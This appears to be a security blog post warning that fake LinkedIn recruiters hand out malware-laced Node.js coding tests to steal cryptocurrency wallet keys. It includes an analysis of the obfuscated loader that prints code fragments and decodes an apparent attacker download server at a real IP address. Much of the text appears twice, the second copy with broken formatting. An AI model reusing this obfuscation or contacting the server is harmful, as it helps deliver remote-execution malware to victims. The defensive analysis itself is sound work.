Beware of LinkedIn Scammers Impersonating Recruiters to Steal Cryptocurrency Wallet Private Keys
Introduction
The rise of cryptocurrency has brought about incredible opportunities, but it has also attracted malicious actors looking to exploit unsuspecting individuals. A concerning trend has emerged where scammers impersonate recruiters on LinkedIn to deceive applicants and steal their cryptocurrency wallet private keys. This blog post outlines the process these attackers use to carry out their schemes and provides guidance on how to protect yourself.
The Scam Process
1. Attackers Pose as Recruiters on LinkedIn
Scammers create fake LinkedIn profiles, masquerading as recruiters from reputable companies in the tech or cryptocurrency sectors. They often use:
Professional-looking profiles with company logos and industry jargon.
Stolen or AI-generated profile pictures to appear legitimate.
Fabricated work histories that include well-known companies.
Their goal is to establish credibility and lure in professionals seeking new opportunities.
2. Attackers Request Completion of a Coding Test
Once contact is made, the fake recruiter expresses interest in your background and skills. They invite you to participate in a technical assessment or coding test as part of the hiring process. This seems like a standard procedure, which lowers your guard.
3. The Malicious Node.js Project
The coding test provided is a Node.js project that appears normal at first glance. However, hidden within the code is a compressed or obfuscated JavaScript script designed to:
Scan your computer for files related to cryptocurrency wallets.
Extract private keys and sensitive information from wallet files.
Silently upload the stolen data to the attacker's server.
Because the malicious code is embedded and concealed, even developers may overlook it during a casual review.
4. Attackers Drain Cryptocurrency Assets
With access to your private keys, the attackers can:
Gain full control of your cryptocurrency wallets.
Transfer out all tokens and coins without your authorization.
Use cross-chain techniques to move assets across different blockchains, making the transactions harder to trace and reverse.
Victims often discover the theft too late, with little recourse to recover their lost assets.
How to Protect Yourself
Verify Recruiter Authenticity
Check Profiles Thoroughly: Look for inconsistencies in their employment history, connections, and endorsements.
Contact Companies Directly: Reach out to the company’s HR department to confirm the recruiter's identity.
Be Wary of Immediate Offers: Legitimate recruiters typically have a formal process and won't rush you.
Exercise Caution with Coding Tests
Analyze the Code: Before running any code, review it carefully for suspicious scripts or dependencies.
Use Sandbox Environments: Run unfamiliar code in a virtual machine or secure sandbox to prevent potential harm to your system.
Question Unusual Requests: Be skeptical if the test requires elevated permissions or accesses files unrelated to the task.
Protect Your Cryptocurrency Wallets
Secure Storage: Keep private keys in encrypted wallets or hardware devices, not in plain text files.
Separate Work and Personal Data: Avoid storing personal cryptocurrency information on devices used for testing or development.
Regular Backups: Maintain up-to-date backups of your wallets in secure locations.
Stay Informed and Vigilant
Educate Yourself: Stay updated on common scams and attack vectors in the cryptocurrency space.
Use Security Software: Install reputable antivirus and anti-malware tools to detect and prevent malicious activities.
Trust Your Instincts: If something feels off, don't proceed without further verification.
Conclusion
The ingenuity of scammers continues to evolve alongside technology. By understanding their methods, you can better defend against their tactics. Remember that legitimate recruiters will respect your security and privacy—they will never require you to compromise your personal information or run suspicious code.
Stay cautious, protect your assets, and share this information to help others avoid falling victim to these scams.
If you have experienced or observed similar scams, consider reporting them to LinkedIn and relevant authorities to aid in the fight against cybercrime.
This code is a highly obfuscated JavaScript script whose primary function is to download an executable file or script from a remote server and execute it on the victim's computer. Here's a detailed analysis of the code:
Code Obfuscation and Self-Protection:
The code uses numerous meaningless variable names and functions, such as E(a,b), aO, ax, etc.
It employs function redefinitions and loops to confuse the code logic, making it difficult to read and understand directly.
It hides actual string representations within encoded or calculated values through numerical and string manipulations.
Dynamic Decoding and Module Loading:
The code uses Buffer.from() and toString() methods to decode encoded strings, such as decoding Base64-encoded strings into readable module names or file paths.
It dynamically loads Node.js core modules like fs (File System), os (Operating System information), path (Path handling), etc.
Collecting System Information:
It retrieves the victim's home directory, hostname, platform type, and user information:
It constructs an HTTP request containing the collected system information and sends it to the attacker's server.
Downloading and Executing Malicious Code:
It constructs a download link to obtain malicious code from a remote server:
const a0 = () => {
let ax = 'MTQ3LjEyNCaHR0cDovLw4yMTQuMTI5OjEyNDQ= ';
// String manipulation and decoding to get the URL
return Q(az) + Q(ay);
};
The code saves the downloaded content to the victim's file system, typically in a hidden folder within the home directory.
It uses the child_process module to execute the downloaded code, which could be a reverse shell or another malicious payload.
Scheduled Tasks and Persistence:
The code sets up a timer using setInterval to periodically execute its main malicious functions, ensuring ongoing malicious activity:
let aw = setInterval(() => {
(au += 1) < 3 ? av() : clearInterval(aw);
}, 0x927c0); // Interval time is 0x927c0 (600,000 milliseconds, i.e., 10 minutes)
Summary:
The primary purpose of this code is to download and execute remote malicious code on the victim's computer, potentially for:
Establishing a reverse shell to give the attacker remote control over the victim's system.
Installing other malware such as keyloggers, cryptocurrency miners, etc.
Collecting and sending the victim's system information, possibly for further attacks or intelligence gathering.
Recommendations:
Do not execute this code in a production environment or personal computer to avoid malware infection.
Use antivirus software and firewalls to prevent the execution of such malicious code and network communication.
Regularly update systems and software to patch known security vulnerabilities.
Educate users not to execute scripts and programs from unknown or suspicious sources.
Analysis of the Download URL:
The code constructs a download URL in a highly obfuscated manner. Here's the step-by-step analysis:
Locating the Function that Builds the Download URL:
const a0 = () => {
let ax = 'MTQ3LjEyNCaHR0cDovLw4yMTQuMTI5OjEyNDQ= ';
for (var ay = '', az = '', aA = '', aB = '', aC = 0x0; aC < 0xa; aC++) {
ay += ax[aC];
az += ax[0xa + aC];
aA += ax[0x14 + aC];
aB += ax[0x1e + aC];
}
return (ay = ay + aA + aB), Q(az) + Q(ay);
};
The code constructs the download URL http://147.124.214.129:1244 by decoding obfuscated Base64 strings.
This URL likely points to a malicious server intended to deliver and execute harmful code on the victim's machine.
Recommendations:
Do not visit the above URL to avoid downloading and executing malicious code, which could lead to security risks.
If you find similar code on your system, it is advisable to conduct a security audit and use professional antivirus software to clean your system.
Be vigilant about suspicious scripts and programs, and avoid running code from unknown sources.
Please Note: Interacting with or analyzing malicious code should be done with caution and preferably within a secure, isolated environment (like a virtual machine) to prevent unintended consequences.
Beware of LinkedIn Scammers Impersonating Recruiters to Steal Cryptocurrency Wallet Private Keys
Introduction
The rise of cryptocurrency has brought about incredible opportunities, but it has also attracted malicious actors looking to exploit unsuspecting individuals. A concerning trend has emerged where scammers impersonate recruiters on LinkedIn to deceive applicants and steal their cryptocurrency wallet private keys. This blog post outlines the process these attackers use to carry out their schemes and provides guidance on how to protect yourself.
The Scam Process
1. Attackers Pose as Recruiters on LinkedIn
Scammers create fake LinkedIn profiles, masquerading as recruiters from reputable companies in the tech or cryptocurrency sectors. They often use:
Their goal is to establish credibility and lure in professionals seeking new opportunities.
2. Attackers Request Completion of a Coding Test
Once contact is made, the fake recruiter expresses interest in your background and skills. They invite you to participate in a technical assessment or coding test as part of the hiring process. This seems like a standard procedure, which lowers your guard.
3. The Malicious Node.js Project
The coding test provided is a Node.js project that appears normal at first glance. However, hidden within the code is a compressed or obfuscated JavaScript script designed to:
Because the malicious code is embedded and concealed, even developers may overlook it during a casual review.
4. Attackers Drain Cryptocurrency Assets
With access to your private keys, the attackers can:
Victims often discover the theft too late, with little recourse to recover their lost assets.
How to Protect Yourself
Verify Recruiter Authenticity
Exercise Caution with Coding Tests
Protect Your Cryptocurrency Wallets
Stay Informed and Vigilant
Conclusion
The ingenuity of scammers continues to evolve alongside technology. By understanding their methods, you can better defend against their tactics. Remember that legitimate recruiters will respect your security and privacy—they will never require you to compromise your personal information or run suspicious code.
Stay cautious, protect your assets, and share this information to help others avoid falling victim to these scams.
If you have experienced or observed similar scams, consider reporting them to LinkedIn and relevant authorities to aid in the fight against cybercrime.
This code is a highly obfuscated JavaScript script whose primary function is to download an executable file or script from a remote server and execute it on the victim's computer. Here's a detailed analysis of the code:
Code Obfuscation and Self-Protection:
E(a,b)
,aO
,ax
, etc.Dynamic Decoding and Module Loading:
Buffer.from()
andtoString()
methods to decode encoded strings, such as decoding Base64-encoded strings into readable module names or file paths.fs
(File System),os
(Operating System information),path
(Path handling), etc.Collecting System Information:
Network Requests and Data Transmission:
request
module to send HTTP requests, potentially to communicate with the attacker's server:Downloading and Executing Malicious Code:
child_process
module to execute the downloaded code, which could be a reverse shell or another malicious payload.Scheduled Tasks and Persistence:
setInterval
to periodically execute its main malicious functions, ensuring ongoing malicious activity:Summary:
The primary purpose of this code is to download and execute remote malicious code on the victim's computer, potentially for:
Recommendations:
Analysis of the Download URL:
The code constructs a download URL in a highly obfuscated manner. Here's the step-by-step analysis:
Locating the Function that Builds the Download URL:
Parsing the String Segments:
ax = 'MTQ3LjEyNCaHR0cDovLw4yMTQuMTI5OjEyNDQ= ';
ay
: Takes 10 characters starting fromax[0]
.az
: Takes 10 characters starting fromax[10]
.aA
: Takes 10 characters starting fromax[20]
.aB
: Takes 10 characters starting fromax[30]
.ay = ay + aA + aB;
ay
andaz
are then passed to the functionQ
for decoding.Function
Q
and Decoding:Decoding Process:
az = 'aHR0cDovLw'
; // Base64 encoded stringay = 'MTQ3LjEyNC4yMTQuMTI5OjEyNDQ='
; // Base64 encoded string (note the padding '=')Q(az)
decodes to'http://'
.Q(ay)
decodes to'147.124.214.129:1244'
.Constructing the Download URL:
Summary:
http://147.124.214.129:1244
by decoding obfuscated Base64 strings.Recommendations:
Please Note: Interacting with or analyzing malicious code should be done with caution and preferably within a secure, isolated environment (like a virtual machine) to prevent unintended consequences.